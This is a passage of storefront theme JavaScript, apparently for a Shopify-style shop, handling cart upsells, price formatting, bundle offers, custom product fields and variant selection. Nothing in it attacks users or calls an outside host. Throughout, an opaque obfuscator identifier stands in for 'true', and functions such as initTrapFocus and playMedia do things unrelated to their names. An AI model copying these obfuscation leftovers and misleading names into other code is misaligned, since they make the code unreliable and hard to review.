    this.cartItems.updateQuantity(existingCartItem.dataset.index, 0);
  }
  updateId(id) {
    this.dataset.id = id;
    this.idInput.value = id;
    if (this.classicAddButton) {
      return;
    }
    if (this.dataset.selected === "true") {
      if (this.selectTimeout) {
        clearTimeout(this.selectTimeout);
      }
      this.removeFromCart();
      const handleCartUpdate = (event) => {
        if (event.detail.handle === "handle") {
          this.addToCart();
          document.removeEventListener("cartQuantityUpdated", handleCartUpdate);
        }
      };
      document.addEventListener("cartQuantityUpdated", handleCartUpdate);
    }
  }
  getUpdateRequired() {
    const existingCartItem = this.cartDrawer.querySelector(
      ".cart-item--product-" + this.dataset.handle,
    );
    let updateRequired = false;
    if (existingCartItem && this.dataset.selected === "false") {
      updateRequired = a0_0x5cl9e6f;
    } else if (!existingCartItem && this.dataset.selected === "true") {
      updateRequired = a0_0x5cl9e6f;
    }
    return updateRequired;
  }
}
customElements.define("cart-drawer-upsell", CartDrawerUpsell);
function displayPrices(
  price,
  comparePrice,
  priceElement,
  comparePriceElement,
  moneyFormat,
) {
  if (!moneyFormat) {
    return;
  }
  if (price && priceElement) {
    var formattedPrice = formatMoney(price, moneyFormat);
    priceElement.innerHTML = formattedPrice;
  }
  if (comparePrice && comparePriceElement) {
    var formattedComparePrice = formatMoney(comparePrice, moneyFormat);
    comparePriceElement.innerHTML = formattedComparePrice;
    if (comparePrice > price) {
      comparePriceElement.classList.remove("hidden");
    } else {
      comparePriceElement.classList.add("hidden");
    }
  }
}
function initTrapFocus() {
  isIe = false;
  if (
    document.querySelector("footer") &&
    document.querySelector("footer").dataset.type === null
  ) {
    return false;
  }
  return a0_0x5cl9e6f;
}
function formatMoney(cents, format, hideZeroCents = false) {
  if (typeof cents == "string") {
    cents = cents.replace(".", "");
  }
  var value = "";
  var placeholderRegex = /\{\{\s*(\w+)\s*\}\}/;
  var formatString = format;
  function defaultOption(opt, def) {
    if (typeof opt == "undefined") {
      return def;
    } else {
      return opt;
    }
  }
  function formatWithDelimiters(number, precision, thousands, decimal) {
    precision = defaultOption(precision, 2);
    thousands = defaultOption(thousands, ",");
    decimal = defaultOption(decimal, ".");
    if (isNaN(number) || number == null) {
      return 0;
    }
    number = (number / 100).toFixed(precision);
    var parts = number.split(".");
    var dollars = parts[0].replace(
      /(\d)(?=(\d\d\d)+(?!\d))/g,
      "$1" + thousands,
    );
    var centsPart = parts[1] ? decimal + parts[1] : "";
    if (hideZeroCents && centsPart === decimal + "00") {
      centsPart = "";
    }
    return dollars + centsPart;
  }
  switch (formatString.match(placeholderRegex)[1]) {
    case "amount":
      value = formatWithDelimiters(cents, 2);
      break;
    case "amount_no_decimals":
      value = formatWithDelimiters(cents, 0);
      break;
    case "amount_with_comma_separator":
      value = formatWithDelimiters(cents, 2, ".", ",");
      break;
    case "amount_no_decimals_with_comma_separator":
      value = formatWithDelimiters(cents, 0, ".", ",");
      break;
  }
  return formatString.replace(placeholderRegex, value);
}
class CartDrawerGift extends CartDrawerUpsell {
  constructor() {
    super();
  }
}
customElements.define("cart-drawer-gift", CartDrawerGift);
function initToggleUpsells() {
  const cartDrawer = document.querySelector("cart-drawer");
  if (cartDrawer) {
    cartDrawer
      .querySelectorAll(
        'cart-drawer-upsell[data-toggle="true"], cart-drawer-gift',
      )
      .forEach((item) => {
        if (item.addRemoveFromCart) {
          item.addRemoveFromCart();
        }
      });
  }
}
initToggleUpsells();
class MainBundleOffer extends HTMLElement {
  constructor() {
    super();
    this.offerItems = this.querySelectorAll(".main-offer-item");
    this.updatePrices = this.dataset.updatePrices === "true";
    if (this.updatePrices) {
      this.priceSpan = this.querySelector(".bundle-deals__total-price-js");
      this.comparePriceSpan = this.querySelector(
        ".bundle-deals__total-compare-price-js",
      );
      this.percentageLeft = parseFloat(this.dataset.percentageLeft);
      this.fixedDiscount = parseFloat(this.dataset.fixedDiscount);
      this.moneyFormat = this.dataset.moneyFormat;
    }
  }
  updateTotalPrices() {
    if (!this.updatePrices) {
      return;
    }
    var totalPrice = 0;
    var totalComparePrice = 0;
    for (let index = 0; index < this.offerItems.length; index++) {
      totalPrice += parseInt(this.offerItems[index].price);
      totalComparePrice += parseInt(this.offerItems[index].comparePrice);
    }
    totalPrice = totalPrice * this.percentageLeft - this.fixedDiscount;
    displayPrices(
      totalPrice,
      totalComparePrice,
      this.priceSpan,
      this.comparePriceSpan,
      this.moneyFormat,
    );
  }
}
customElements.define("main-bundle-offer", MainBundleOffer);
class CustomProductField extends HTMLElement {
  constructor() {
    super();
  }
  connectedCallback() {
    this.fieldName = this.dataset.name;
    this.input = this.querySelector('[type="text"], [type="number"], textarea');
    this.inputRadios = this.querySelectorAll('[type="radio"]');
    this.select = this.querySelector(".select__select");
    this.productForm = document.getElementById(
      "product-form-" + this.dataset.section,
    );
    this.prevValue = this.dataset.defaultValue;
    this.isRequired = this.dataset.required === "true";
    this.isText = a0_0x5cl9e6f;
    this.notMain = this.dataset.notMain === "true";
    if (this.dataset.type === "select" || this.dataset.type === "pills") {
      this.isText = false;
    }
    this.createInputs();
    if (this.isRequired && this.isText) {
      this.isValid = a0_0x5cl9e6f;
      this.atcButtons = this.notMain
        ? document.querySelectorAll(
            ".featured-product-atc-" + this.dataset.section,
          )
        : document.querySelectorAll(".main-product-atc");
      this.mainAtcButton = this.productForm.querySelector(
        "#ProductSubmitButton-" + this.dataset.section,
      );
      this.mainAtcBtnLabel =
        this.mainAtcButton.querySelector(".main-atc__label");
      this.mainAtcBtnError =
        this.mainAtcButton.querySelector(".main-atc__error");
      this.atcErrorMsg = this.dataset.atcErrorMsg;
      this.mainAtcButton.dataset.requiredFields =
        parseInt(this.mainAtcButton.dataset.requiredFields) + 1;
      this.mainAtcBtnError.innerHTML = this.atcErrorMsg;
      this.applyStickyAtcError = this.dataset.applyStickyAtcError === "true";
      this.stickyAtcButton = document.querySelector(
        "#sticky-atc-" + this.dataset.section,
      );
      if (this.applyStickyAtcError && this.stickyAtcButton) {
        this.stickyAtcBtnLabel =
          this.stickyAtcButton.querySelector(".sticky-atc__label");
        this.stickyAtcBtnError =
          this.stickyAtcButton.querySelector(".sticky-atc__error");
        this.stickyAtcBtnError.innerHTML = this.atcErrorMsg;
      }
      this.validateValue(this.prevValue, null);
    }
    if (this.input) {
      this.input.addEventListener("input", this.handleChange.bind(this));
    }
    this.inputRadios.forEach((radio) => {
      radio.addEventListener("input", this.handleChange.bind(this));
    });
    if (this.select) {
      this.select.addEventListener("change", this.handleChange.bind(this));
    }
  }
  handleChange(event) {
    const value = event.target.value.trim();
    if (event.target.checkValidity()) {
      this.prevValue = value;
    } else {
      event.target.value = this.prevValue;
      return;
    }
    this.dataset.value = value;
    this.productFormInput.value = value;
    if (this.isRequired && this.isText) {
      this.validateValue(value, event.target);
    }
  }
  validateValue(value, input) {
    const isValid = value.length > 0 ? a0_0x5cl9e6f : false;
    if (isValid === this.isValid) {
      return;
    }
    this.isValid = isValid;
    if (input) {
      if (this.isValid) {
        input.classList.remove("input--error");
        this.mainAtcButton.dataset.validFields =
          parseInt(this.mainAtcButton.dataset.validFields) + 1;
      } else {
        input.classList.add("input--error");
        this.mainAtcButton.dataset.validFields =
          parseInt(this.mainAtcButton.dataset.validFields) - 1;
      }
    }
    const allFieldsValid =
      this.mainAtcButton.dataset.validFields ===
      this.mainAtcButton.dataset.requiredFields;
    const isUnavailable = this.mainAtcButton.dataset.unavailable === "true";
    this.atcButtons.forEach((button) => {
      if (allFieldsValid && !isUnavailable) {
        button.removeAttribute("disabled");
      } else {
        button.setAttribute("disabled", "");
      }
    });
    if (this.atcErrorMsg.length === 0) {
      return;
    }
    if (allFieldsValid) {
      this.mainAtcBtnLabel.style.display = "";
      this.mainAtcBtnError.style.display = "none";
      if (this.applyStickyAtcError && this.stickyAtcButton) {
        this.stickyAtcBtnLabel.style.display = "";
        this.stickyAtcBtnError.style.display = "none";
      }
    } else {
      this.mainAtcBtnLabel.style.display = "none";
      this.mainAtcBtnError.style.display = "";
      if (this.applyStickyAtcError && this.stickyAtcButton) {
        this.stickyAtcBtnLabel.style.display = "none";
        this.stickyAtcBtnError.style.display = "";
      }
    }
  }
  createInputs() {
    this.productFormInput = document.createElement("input");
    this.productFormInput.setAttribute("type", "hidden");
    this.productFormInput.setAttribute(
      "name",
      "properties[" + this.fieldName + "]",
    );
    this.productFormInput.value = this.dataset.defaultValue;
    this.productForm.appendChild(this.productFormInput);
  }
}
customElements.define("custom-product-field", CustomProductField);
function playMedia() {
  if (!serial) {
    serial = document.currentScript.dataset.animationsType || "";
  }
}
class VariantSelects extends HTMLElement {
  constructor() {
    super();
    this.secondarySelectSelector = "StickyAtcVariantPicker-";
    this.secondarySelect = document.getElementById(
      "" + this.secondarySelectSelector + this.dataset.section,
    );
    this.isSecondary = false;
    this.QuantityBreaks = document.getElementById(
      "quantity-breaks-" + this.dataset.section,
    );
    this.hasQuantityBreaksPicker =
      this.dataset.hasQuantityBreaksPicker === "true";
    this.prependMedia = this.dataset.disablePrepend != "true";
    this.filtering = this.dataset.hasFiltering === "true";
    this.skipNonExistent = this.dataset.skipNonExistent === "true";
    this.skipUnavailable = this.dataset.skipUnavailable === "true";
    if (this.hasQuantityBreaksPicker) {
      this.quantityBreaksPickerStyle = this.dataset.quantityBreaksPickerStyle;
      this.quantityBreaksPickerDisplayedImages =
        this.dataset.quantityBreaksPickerDisplayedImages;
    }
    this.addEventListener("change", this.onVariantChange);
  }
  onVariantChange() {
    this.updateOptions();
    this.updateMasterId();
    this.toggleAddButton(a0_0x5cl9e6f, "", false);
    this.updatePickupAvailability();
    this.removeErrorMessage();
    this.updateVariantStatuses();
    if (!this.currentVariant) {
      this.toggleAddButton(a0_0x5cl9e6f, "", a0_0x5cl9e6f);
      if (
        this.skipNonExistent &&
        findAvailableVariant(
          this,
          this.options,
          a0_0x5cl9e6f,
          a0_0x5cl9e6f,
          this.skipUnavailable,
        )
      ) {
        return;
      }
      this.setUnavailable();
    } else {
      if (this.skipUnavailable && !this.currentVariant.available) {
        if (
          findAvailableVariant(
            this,
            this.options,
            a0_0x5cl9e6f,
            a0_0x5cl9e6f,
            a0_0x5cl9e6f,
          )
        ) {
          return;
        }
      }
      this.updateMedia();
      this.updateURL();
      this.updateVariantInput();
      this.renderProductInfo();
      this.updateShareUrl();
    }
  }
  updateOptions() {
    const options = [];
    this.querySelectorAll(".product-form__input").forEach((input) => {
      let value;
      const type = input.querySelector(".product-form__input__type").dataset
        .type;
      if (type == "dropdown" || type == "dropdwon") {
        value = input.querySelector(".select__select").value;
      } else {
        value = input.querySelector('input[type="radio"]:checked').value;
      }
      options.push(value);
    });
    this.options = options;
  }
  updateMasterId() {
    this.currentVariant = this.getVariantData().find((variant) => {
      return !variant.options
        .map((option, index) => {
          return this.options[index] === option;
        })
        .includes(false);
    });
  }
  updateMedia() {
    if (!this.currentVariant) {
      return;
    }
    if (!this.currentVariant.featured_media) {
      return;
    }
    const mediaGalleries = document.querySelectorAll(
      '[id^="MediaGallery-' + this.dataset.section + '"]',
    );
    mediaGalleries.forEach((mediaGallery) =>
      mediaGallery.setActiveMedia(
        this.dataset.section + "-" + this.currentVariant.featured_media.id,
        this.prependMedia,
        this.filtering,
        this.currentVariant,
      ),
    );
    const modalContent = document.querySelector(
      "#ProductModal-" +
        this.dataset.section +
        " .product-media-modal__content",
    );
    if (!modalContent) {
      return;
    }
    const newMediaModal = modalContent.querySelector(
      '[data-media-id="' + this.currentVariant.featured_media.id + '"]',
    );
    modalContent.prepend(newMediaModal);
  }
  updateURL() {
    if (!this.currentVariant || this.dataset.updateUrl === "false") {
      return;
    }
    window.history.replaceState(
      {},
      "",
      this.dataset.url + "?variant=" + this.currentVariant.id,
    );
  }
  updateShareUrl() {
    const shareButton = document.getElementById(
      "Share-" + this.dataset.section,
    );
    if (!shareButton || !shareButton.updateUrl) {
      return;
    }
    shareButton.updateUrl(
      "" +
        window.shopUrl +
        this.dataset.url +
        "?variant=" +
        this.currentVariant.id,
    );
  }
  updateVariantInput() {
    const productForms = document.querySelectorAll(
      "#product-form-" +
        this.dataset.section +
        ", #product-form-installment-" +
        this.dataset.section,
    );
    productForms.forEach((productForm) => {
      const input = productForm.querySelector('input[name="id"]');
      input.value = this.currentVariant.id;
      input.dispatchEvent(
        new Event("change", {
          bubbles: a0_0x5cl9e6f,
        }),
      );
    });
  }
  updateVariantStatuses() {
    const selectedOptionOneVariants = this.variantData.filter(
      (variant) => this.querySelector(":checked").value === variant.option1,
    );
    let inputWrappers;
    if (this.isSecondary && this.secondarySelect) {
      inputWrappers = [
        ...this.secondarySelect.querySelectorAll(".product-form__input"),
      ];
    } else {
      inputWrappers = [...this.querySelectorAll(".product-form__input")];
    }
    inputWrappers.forEach((option, index) => {
      if (index === 0) {
        return;
      }
      const optionInputs = [
        ...option.querySelectorAll(
          'input[type="radio"], .select__select option',
        ),
      ];
      const previousOptionSelected =
        inputWrappers[index - 1].querySelector(":checked").value;
      const availableOptionInputsValue = selectedOptionOneVariants
        .filter(
          (variant) =>
            variant.available &&
            variant["option" + index] === previousOptionSelected,
        )
        .map((variant) => variant["option" + (index + 1)]);
      const existingOptionInputsValue = selectedOptionOneVariants
        .filter(
          (variant) => variant["option" + index] === previousOptionSelected,
        )
        .map((variant) => variant["option" + (index + 1)]);
      this.setInputAvailability(
        optionInputs,
        availableOptionInputsValue,
        existingOptionInputsValue,
      );
    });
  }
  setInputAvailability(
    listOfOptions,
    listOfAvailableOptions,
    listOfExistingOptions,
  ) {
    listOfOptions.forEach((input) => {
      input.classList.remove("unavailable", "non-existent", "disabled");
      const value = input.getAttribute("value");
      let swatch = null;
      if (input.dataset.swatch === "true") {
        swatch = input.closest(".color-swatch");
      }
      if (swatch) {
        swatch.classList.remove("unavailable", "non-existent", "disabled");
      }
      if (listOfExistingOptions.includes(value)) {
        if (listOfAvailableOptions.includes(value)) {
          if (input.nodeName === "OPTION") {
            input.innerText = value;
          } else {
            input.classList.remove("disabled");
            if (swatch) {
              swatch.classList.remove("disabled");
            }
          }
        } else if (input.nodeName === "OPTION") {
          input.innerText =
            window.variantStrings.unavailable_with_option.replace(
              "[value]",
              value,
            );
          input.classList.add("unavailable");
        } else {
          input.classList.add("disabled", "unavailable");
          if (swatch) {
            swatch.classList.add("disabled", "unavailable");
          }
        }
      } else if (input.nodeName === "OPTION") {
        input.innerText = window.variantStrings.unavailable_with_option.replace(
          "[value]",
          value,
        );
        input.classList.add("non-existent");
      } else {
        input.classList.add("disabled", "non-existent");
        if (swatch) {
          swatch.classList.add("disabled", "non-existent");
        }
      }
    });
  }
  updatePickupAvailability() {
    const pickUpAvailability = document.querySelector("pickup-availability");
    if (!pickUpAvailability) {
      return;
    }
    if (this.currentVariant && this.currentVariant.available) {
      if (pickUpAvailability.fetchAvailability) {
        pickUpAvailability.fetchAvailability(this.currentVariant.id);
      }
    } else {
      pickUpAvailability.removeAttribute("available");
      pickUpAvailability.innerHTML = "";
    }
  }
  removeErrorMessage() {
    const section = this.closest("section");
    if (!section) {
      return;
    }
    const productForm = section.querySelector("product-form");
    if (productForm) {
      productForm.handleErrorMessage();
    }
  }
  renderProductInfo() {
    const requestedVariantId = this.currentVariant.id;
    const sectionId = this.dataset.originalSection
      ? this.dataset.originalSection
      : this.dataset.section;
    fetch(
      this.dataset.url +
        "?variant=" +
        requestedVariantId +
        "&section_id=" +
        (this.dataset.originalSection
          ? this.dataset.originalSection
          : this.dataset.section),
    )
      .then((response) => response.text())
      .then((responseText) => {
        if (this.currentVariant.id !== requestedVariantId) {
          return;
        }
        const html = new DOMParser().parseFromString(responseText, "text/html");
        const priceDestination = document.getElementById(
          "price-" + this.dataset.section,
        );
        const priceSource = html.getElementById(
          "price-" +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section),
        );
        const stickyAtcSeparatePriceDestination = document.getElementById(
          "sticky-atc-separate-price-" + this.dataset.section,
        );
        const stickyAtcSeparatePriceSource = html.getElementById(
          "sticky-atc-separate-price-" +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section),
        );
        const stickyAtcPriceDestination = document.getElementById(
          "sticky-atc-price-" + this.dataset.section,
        );
        const stickyAtcPriceSource = html.getElementById(
          "sticky-atc-price-" +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section),
        );
        const stickyAtcImageDestination = document.getElementById(
          "sticky-atc-image-" + this.dataset.section,
        );
        const stickyAtcImageSource = html.getElementById(
          "sticky-atc-image-" +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section),
        );
        const mainAtcPriceDestination = document.getElementById(
          "main-atc-price-" + this.dataset.section,
        );
        const mainAtcPriceSource = html.getElementById(
          "main-atc-price-" +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section),
        );
        const customLabelDestinations = document.querySelectorAll(
          '[id^="custom-label-' + this.dataset.section + '"]',
        );
        const customLabelSources = html.querySelectorAll(
          '[id^="custom-label-' +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section) +
            '"]',
        );
        const skuSource = html.getElementById(
          "Sku-" +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section),
        );
        const skuDestination = document.getElementById(
          "Sku-" + this.dataset.section,
        );
        const inventorySource = html.getElementById(
          "Inventory-" +
            (this.dataset.originalSection
              ? this.dataset.originalSection
              : this.dataset.section),
        );
        const inventoryDestination = document.getElementById(
          "Inventory-" + this.dataset.section,
        );
        if (priceDestination && priceSource) {
          priceDestination.innerHTML = priceSource.innerHTML;
        }
        if (stickyAtcSeparatePriceDestination && stickyAtcSeparatePriceSource) {
          stickyAtcSeparatePriceDestination.innerHTML =
            stickyAtcSeparatePriceSource.innerHTML;
        }
        if (stickyAtcPriceDestination && stickyAtcPriceSource) {
          stickyAtcPriceDestination.innerHTML = stickyAtcPriceSource.innerHTML;
        }
        if (stickyAtcImageDestination && stickyAtcImageSource) {
          stickyAtcImageDestination.src = stickyAtcImageSource.src;
        }
        if (mainAtcPriceSource && mainAtcPriceDestination) {
          mainAtcPriceDestination.innerHTML = mainAtcPriceSource.innerHTML;
        }
        if (customLabelDestinations && customLabelSources) {
          for (var index = 0; index < customLabelDestinations.length; index++) {
            customLabelDestinations[index].innerHTML =
              customLabelSources[index].innerHTML;
          }
        }
        if (inventorySource && inventoryDestination) {
          inventoryDestination.innerHTML = inventorySource.innerHTML;
        }
        if (skuSource && skuDestination) {
          skuDestination.innerHTML = skuSource.innerHTML;
          skuDestination.classList.toggle(
            "visibility-hidden",
            skuSource.classList.contains("visibility-hidden"),
          );
        }
        if (this.QuantityBreaks) {
          const quantityBreaksSource = html.getElementById(
            "quantity-breaks-" +
              (this.dataset.originalSection
                ? this.dataset.originalSection
                : this.dataset.section),
          );
          const dynamicPriceDestinations =
            this.QuantityBreaks.querySelectorAll(".dynamic-price");
          const dynamicPriceSources =
            quantityBreaksSource.querySelectorAll(".dynamic-price");
          for (
            let index_2 = 0;
            index_2 < dynamicPriceDestinations.length;
            index_2++
          ) {
            dynamicPriceDestinations[index_2].innerHTML =
              dynamicPriceSources[index_2].innerHTML;
          }
          if (this.QuantityBreaks.hasVariants) {
            this.QuantityBreaks.variantSelects.forEach((variantSelect) => {
              variantSelect.dataset.selectedId = this.currentVariant.id;
            });
            const variantSelectDestinations =
              this.QuantityBreaks.querySelectorAll(
                ".quantity-break__variant-select",
              );
            const variantSelectSources = quantityBreaksSource.querySelectorAll(
              ".quantity-break__variant-select",
            );
            for (
              let index_2 = 0;
              index_2 < variantSelectDestinations.length;
              index_2++
            ) {
              variantSelectDestinations[index_2].innerHTML =
                variantSelectSources[index_2].innerHTML;
            }
            this.QuantityBreaks.initVariants();
          }
        }
        if (this.hasQuantityBreaksPicker) {
          const variantSelectsSource = html.getElementById(
            "variant-selects-" +
              (this.dataset.originalSection
                ? this.dataset.originalSection
                : this.dataset.section),
          );
          const dynamicPriceDestinations =
            this.querySelectorAll(".dynamic-price");
          const dynamicPriceSources =
            variantSelectsSource.querySelectorAll(".dynamic-price");
          for (
            let index_2 = 0;
            index_2 < dynamicPriceDestinations.length;
            index_2++
          ) {
            dynamicPriceDestinations[index_2].innerHTML =
              dynamicPriceSources[index_2].innerHTML;
          }
          if (
            this.quantityBreaksPickerStyle === "vertical" &&
            this.quantityBreaksPickerDisplayedImages === "variant_images"
          ) {
            const variantImageDestinations = this.querySelectorAll(
              ".quantity-break__image img",
            );
            const variantImageSources = variantSelectsSource.querySelectorAll(
              ".quantity-break__image img",
            );
            for (
              let index_2 = 0;
              index_2 < variantImageDestinations.length;
              index_2++
            ) {
              variantImageDestinations[index_2].src =
                variantImageSources[index_2].src;
            }
          }
        }
        if (this.secondarySelect) {
          const secondarySelectSource = html.getElementById(
            "" +
              this.secondarySelectSelector +
              (this.dataset.originalSection
                ? this.dataset.originalSection
                : this.dataset.section),
          );
          if (secondarySelectSource) {
            this.secondarySelect.innerHTML = secondarySelectSource.innerHTML;
          }
        }
        const priceElement = document.getElementById(
          "price-" + this.dataset.section,
        );
        if (priceElement) {
          priceElement.classList.remove("visibility-hidden");
        }
        if (inventoryDestination) {
          inventoryDestination.classList.toggle(
            "visibility-hidden",
            inventorySource.innerText === "",
          );
        }
        const addButtonUpdated = html.getElementById(
          "ProductSubmitButton-" + sectionId,
        );
        this.toggleAddButton(
          addButtonUpdated
            ? addButtonUpdated.hasAttribute("disabled")
            : a0_0x5cl9e6f,
          window.variantStrings.soldOut,
        );
        publish(PUB_SUB_EVENTS.variantChange, {
          data: {
            sectionId: sectionId,
            html: html,
            variant: this.currentVariant,
          },
        });
      });
  }
  toggleAddButton(disable = a0_0x5cl9e6f, text, modifyClass = a0_0x5cl9e6f) {
    const productForm = document.getElementById(
      "product-form-" + this.dataset.section,
    );
    if (!productForm) {
      return;
    }
    const addButton = productForm.querySelector('[name="add"]');
    const mainProductAtcButtons =
      document.querySelectorAll(".main-product-atc");
    var addButtonText = productForm.querySelector(".main-atc__label__text");
    if (!addButtonText) {
      addButtonText = productForm.querySelector(".main-atc__label");
    }
    const mainAtcPrice = productForm.querySelector(".main-atc-price");
    if (!addButton) {
      return;
    }
    if (disable) {
      addButton.setAttribute("disabled", "disabled");
      addButton.setAttribute("data-unavailable", "true");
      if (text) {
        addButtonText.textContent = text;
      }
      mainProductAtcButtons.forEach((button) => {
        button.setAttribute("disabled", "disabled");
      });
      if (mainAtcPrice) {
        mainAtcPrice.classList.add("hidden");
      }
    } else {
      addButton.setAttribute("data-unavailable", "false");
      addButtonText.textContent = window.variantStrings.addToCart;
      if (mainAtcPrice) {
        mainAtcPrice.classList.remove("hidden");
      }
      if (addButton.dataset.requiredFields === addButton.dataset.validFields) {
        addButton.removeAttribute("disabled");
        mainProductAtcButtons.forEach((button) => {
          button.removeAttribute("disabled");
        });
      }
    }
    if (!modifyClass) {
      return;
    }
  }
  setUnavailable() {
    const productForm = document.getElementById(
      "product-form-" + this.dataset.section,
    );
    if (!productForm) {
      return;
    }
    const addButton = productForm.querySelector('[name="add"]');
    var addButtonText = productForm.querySelector(".main-atc__label__text");
    if (!addButtonText) {
      addButtonText = productForm.querySelector(".main-atc__label");
    }
    const price = document.getElementById("price-" + this.dataset.section);
    const inventory = document.getElementById(
      "Inventory-" + this.dataset.section,
    );
    const sku = document.getElementById("Sku-" + this.dataset.section);
    if (!addButton) {
      return;
    }
    addButtonText.textContent = window.variantStrings.unavailable;
    if (price) {
      price.classList.add("visibility-hidden");
    }
    if (inventory) {
      inventory.classList.add("visibility-hidden");
    }
    if (sku) {
      sku.classList.add("visibility-hidden");
    }
  }
  getVariantData() {
    this.variantData =
      this.variantData ||
      JSON.parse(this.querySelector('[type="application/json"]').textContent);
    return this.variantData;
  }
}
customElements.define("variant-selects", VariantSelects);
class SecondaryVariantSelect extends VariantSelects {
  constructor() {
    super();
    this.secondarySelectSelector = "variant-selects-";
    this.secondarySelect = document.getElementById(
      "" + this.secondarySelectSelector + this.dataset.section,
    );
    this.isSecondary = a0_0x5cl9e6f;
  }
  updateOptions() {
    this.options = this.querySelector("select").value.split(",");
  }
}
customElements.define("secondary-variant-select", SecondaryVariantSelect);
class SecondaryVariantSelectSeparate extends VariantSelects {
  constructor() {
    super();
    this.secondarySelectSelector = "variant-selects-";
    this.secondarySelect = document.getElementById(
      "" + this.secondarySelectSelector + this.dataset.section,
    );
    this.isSecondary = a0_0x5cl9e6f;
  }
}
customElements.define(
  "secondary-variant-select-separate",
  SecondaryVariantSelectSeparate,
);
class CardVariantSelects extends VariantSelects {
  constructor() {
    super();
    this.quickAddSubmit = document.getElementById(
      this.dataset.section + "-submit",
    );
  }
  onVariantChange() {
    this.updateOptions();
    this.updateMasterId();
    this.toggleAddButton(a0_0x5cl9e6f, "", false);
    this.updateVariantStatuses();
    if (!this.currentVariant) {
      this.toggleAddButton(a0_0x5cl9e6f, "", a0_0x5cl9e6f);
      this.setUnavailable();
    } else {
      this.updateMedia();
      this.updateVariantInput();
      this.updateQuickAddUrl();
      this.toggleAddButton(
        !this.currentVariant.available,
        window.variantStrings.soldOut,
      );
    }
  }
  updateMedia() {
    if (!this.currentVariant || !this.currentVariant.featured_media) {
      return;
    }
    const image = document.getElementById(this.dataset.section + "-image");
    if (!image) {
      return;
    }
    const previewImage = this.currentVariant.featured_media.preview_image;
    const baseSrc = previewImage.src.split("?")[0];
    const widths = [165, 360, 533, 720, 940, 1066];
    const srcset = widths
      .filter((width) => previewImage.width >= width)
      .map((width) => baseSrc + "?width=" + width + " " + width + "w")
      .join(", ");
    image.srcset = srcset + ", " + baseSrc + " " + previewImage.width + "w";
    image.src = baseSrc + "?width=533";
  }
  updateQuickAddUrl() {
    if (!this.currentVariant || !this.quickAddSubmit) {
      return;
    }
    this.quickAddSubmit.dataset.productUrl =
      this.dataset.url + "?variant=" + this.currentVariant.id;
  }
}
customElements.define("card-variant-selects", CardVariantSelects);
